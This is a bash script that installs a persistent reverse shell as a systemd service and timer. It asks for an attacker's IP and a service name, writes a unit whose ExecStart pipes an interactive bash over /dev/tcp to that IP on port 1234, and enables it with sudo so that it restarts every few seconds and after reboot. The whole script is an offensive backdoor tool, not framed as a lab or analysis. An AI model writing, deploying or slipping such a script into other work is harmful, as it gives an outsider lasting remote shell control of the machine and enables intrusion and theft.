#!/usr/bin/env bash

echo -e "\033[1;31mTo run a command use simboc\033[0m"
echo ""

# Ask for server IP
read -p "Enter the server IP: " IP

# Ask the user how they want to name the service
read -p "How do you want to name the service? (Enter the service name without the .service extension): " service_name

# Ask the user for the execution frequency in minutes
read -p "How often do you want to execute the script (in minutes)? " frequency

# Validate user input
if ! [[ "$frequency" =~ ^[0-9]+$ ]]; then
    echo "Error: Please enter a valid integer for the frequency."
    exit 1
fi

# Generate the content for the .service file
service_content="[Unit]
Description=Reverse PTY to $IP
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'exec 3<>/dev/tcp/$IP/1234; exec 0<&3 1>&3 2>&3; exec /bin/bash -i'
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target
"

# Save the content to a .service file
echo "$service_content" | sudo tee "/etc/systemd/system/$service_name.service" > /dev/null

# Generate the content for the .timer file
timer_content="[Unit]
Description=Timer to execute the $service_name service

[Timer]
OnUnitActiveSec=${frequency}min
AccuracySec=1min
Persistent=true

[Install]
WantedBy=timers.target
"

# Save the content to a .timer file
echo "$timer_content" | sudo tee "/etc/systemd/system/$service_name.timer" > /dev/null

echo ""
echo "The files '$service_name.service' and '$service_name.timer' have been created successfully."
echo "Reloading systemd to detect the changes..."
sudo systemctl daemon-reload
echo "Systemd reloaded successfully."
echo ""

echo "enabled and started"
sudo systemctl enable "$service_name.service"
sudo systemctl enable "$service_name.timer"
sudo systemctl start "$service_name.service"
sudo systemctl start "$service_name.timer"

# Function to CTL the created service if the user desires
show_service_status() {
    printf 'CTL the service? [\033[32ms\033[0m/n]: '
    read -n1 answer
    echo
    if [[ "$answer" == "s" ]]; then
        ctl "$service_name"
    fi
}

# Call the function
show_service_status

echo ""
echo "Directory of the files:"
echo "/etc/systemd/system/"
